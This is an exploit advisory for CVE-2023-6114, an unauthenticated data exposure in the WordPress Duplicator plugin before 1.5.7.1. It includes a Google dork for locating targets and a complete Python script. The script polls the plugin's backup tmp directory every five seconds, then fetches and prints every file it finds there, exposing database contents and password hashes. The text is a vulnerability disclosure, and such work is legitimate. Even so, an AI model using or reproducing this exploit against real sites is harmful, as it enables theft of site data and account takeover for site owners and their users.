Headline
WordPress Duplicator Data Exposure / Account Takeover
WordPress Duplicator plugin versions prior to 1.5.7.1 suffer from an unauthenticated sensitive data exposure vulnerability that can lead to account takeover.
# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -Unauthenticated Sensitive Data Exposure to Account Takeover# Google Dork: inurl:("plugins/duplicator/")# Date: 2023-12-04# Exploit Author: Dmitrii Ignatyev# Vendor Homepage:https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free# Software Link: https://wordpress.org/plugins/duplicator/# Version: 1.5.7.1# Tested on: Wordpress 6.4# CVE : CVE-2023-6114# CVE-Link :https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/Asevere vulnerability has been discovered in the directory*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not onlyexposes extensive information about the site, including itsconfiguration, directories, and files, but more critically, itprovides unauthorized access to sensitive data within the database andall data inside. Exploiting this vulnerability poses an imminentthreat, leading to potential *brute force attacks on password hashesand, subsequently, the compromise of the entire system*.*POC*:1) It is necessary that either the administrator or auto-backup worksautomatically at the scheduled time2) Exploit will send file search requests every 5 seconds3) I attack the site with this vulnerability using an exploitExploit sends a request to the server every 5 seconds along the path“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/<http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and ifit finds something in the index of, it instantly parses all the dataand displays it on the screenExploit (python3):import requestsfrom bs4 import BeautifulSoupimport reimport timeurl = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"processed_files = set()def get_file_names(url): response = requests.get(url) if response.status_code == 200 and len(response.text) > 0: soup = BeautifulSoup(response.text, 'html.parser') links = soup.find_all('a') file_names = [] for link in links: file_name = link.get('href') if file_name != "../" and not file_name.startswith("?"): file_names.append(file_name) return file_names return []def get_file_content(url, file_name): file_url = url + file_name if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE): print(f"Ignoring file: {file_name}") return None file_response = requests.get(file_url) if file_response.status_code == 200: return file_response.text return Nonewhile True: file_names = get_file_names(url) if file_names: print("File names on the page:") for file_name in file_names: if file_name not in processed_files: print(file_name) file_content = get_file_content(url, file_name) if file_content is not None: print("File content:") print(file_content) processed_files.add(file_name) time.sleep(5)-- With best regards,Dmitrii Ignatyev, Penetration Tester